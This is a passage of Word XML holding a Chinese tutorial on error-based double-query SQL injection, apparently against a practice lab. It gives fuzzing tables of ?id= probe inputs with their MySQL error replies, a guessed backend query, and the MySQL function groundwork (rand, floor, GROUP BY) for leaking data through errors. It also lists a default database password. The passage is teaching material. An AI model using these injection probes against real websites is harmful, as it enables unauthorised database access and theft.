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420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C1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00056B95" w:rsidP="00CC1635">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入字符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00056B95" w:rsidP="00CC1635">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>?id=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635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input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRPr="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRPr="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d=</w:t>
            </w:r>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRPr="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d=</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRPr="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d=</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRPr="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d=</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRPr="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d=</w:t>
            </w:r>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d=</w:t>
            </w:r>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1635" w:rsidTr="00CC1635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635">
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:t>=helele</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5891" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635" w:rsidP="00CC1635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input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C9292F" w:rsidRDefault="00CC1635">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1635" w:rsidRDefault="00CC1635">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断得到 请求结果有效的时候返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1635">
        <w:t>You are in...........</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无效时候无对应字符返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1635" w:rsidRDefault="00056B95">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uzzing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行模糊测试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6B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>输入字符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r>
              <w:t>?id=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00CC1635">
              <w:t>?id=1'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00CC1635">
              <w:t>?id=1\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1\" LIMIT 0,1' at line 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00CC1635">
              <w:t>?id=1"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00CC1635">
              <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r>
              <w:t>?id=1;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>?id=1%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRPr="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>?id=1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>?id=1(</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>?id=1(aa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95">
            <w:r w:rsidRPr="00056B95">
              <w:t>You are in...........</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRPr="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00056B95" w:rsidTr="00056B95">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00056B95" w:rsidRPr="00056B95" w:rsidRDefault="00056B95" w:rsidP="00056B95"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95">
      <w:r>
        <w:t>从上面的模糊测试，我们知道</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:tooltip="MySQL知识库" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="DF3434"/>
          </w:rPr>
          <w:t>数据库</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>没有返回任何输出，因此我们不能使用 UNION SELECT 获取数据库信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95">
      <w:r>
        <w:t>数据库返回到页面上的唯一信息就是，</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:tooltip="MySQL知识库" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="DF3434"/>
          </w:rPr>
          <w:t>MySQL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>错误。因此，我们需要以一种方式处理我们的查询，以便通过错误获取数据库信息。查询条件必须是正确的，能被后端数据库解释执行，且需产生一个逻辑错误，让数据库信息伴随错误字符串返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00056B95" w:rsidRDefault="00056B95"/>
    <w:p w:rsidR="00056B95" w:rsidRDefault="005006CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">猜测查询语句是 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:r>
        <w:t>SELECT * FROM TABLE_NAEM WHERE ID=’VALUE WE ARE INJECT’LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:hAnsi="AR PL KaitiM GB" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在我们进一步</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:hAnsi="AR PL KaitiM GB" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注入之前，我们需要理解子查询的基本知识。子查询可以理解为，将一个查询置于一个已存在的查询中，或将查询作为另一个查询的一部分。动态处理内部查询，并生成最终结果，例如</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Select concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>(select database())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:hAnsi="AR PL KaitiM GB" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注意不要写错。上述查询中，蓝色部分就是子查询，它会首先被评估。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:hAnsi="AR PL KaitiM GB" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>然后结果被传递给</w:t>
      </w:r>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:hAnsi="AR PL KaitiM GB" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先熟悉几个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rand</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:r>
        <w:t>Floor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:r>
        <w:t>Count()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE">
      <w:r>
        <w:t>Group by clause</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006CE">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:eastAsia="宋体" w:hAnsi="AR PL KaitiM GB" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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有些厉害的测试工程师发现，将</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Groupby clause</w:t>
      </w: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与一个聚合函数一起使用，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>count(*)</w:t>
      </w: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，可以将查询的部分内容作为错误信息返回。也就发展为今天的二次注入查询。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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06CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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在开始完整的操作前，我们先来打个基础。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9975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779"/>
        <w:gridCol w:w="4196"/>
      </w:tblGrid>
      <w:tr w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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mysql -uroot -p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backtrack r3 </w:t>
            </w:r>
            <w:r w:rsidRPr="005006CE">
              <w:rPr>
                <w:rFonts w:ascii="AR PL KaitiM GB" w:eastAsia="宋体" w:hAnsi="AR PL KaitiM GB" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>默认数据库口令为</w:t>
            </w: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root/toor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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use security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AR PL KaitiM GB" w:eastAsia="宋体" w:hAnsi="AR PL KaitiM GB" w:cs="宋体" w:hint="eastAsia"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>选择数据库</w:t>
            </w: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security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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select concat((select database()));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06CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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select concat(“string1”, “string2”);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06CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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select rand();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06CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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select floor(1.1234567);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06CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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select floor(rand()*2)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06CE" w:rsidRPr="005006CE" w:rsidTr="005006CE">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa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select concat((select database()), floor(rand()*2));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06CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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6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5006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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06CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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7"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="AR PL KaitiM GB" w:eastAsia="宋体" w:hAnsi="AR PL KaitiM GB" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>分析查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005006CE" w:rsidRPr="005006CE" w:rsidRDefault="005006CE" w:rsidP="005006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6CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql&gt;select concat((select database()), floor(rand()*2));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+----------------------------------------------+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|concat((select database()), floor(rand()*2))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+----------------------------------------------+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|security1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+----------------------------------------------+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1row in set (0.00 sec)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mysql&gt;select concat((select database()), floor(rand()*2)) from users;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+----------------------------------------------+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|concat((select database()), floor(rand()*2))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+----------------------------------------------+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|security1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|security0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</w:r>
      <w:r w:rsidRPr="005006CE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
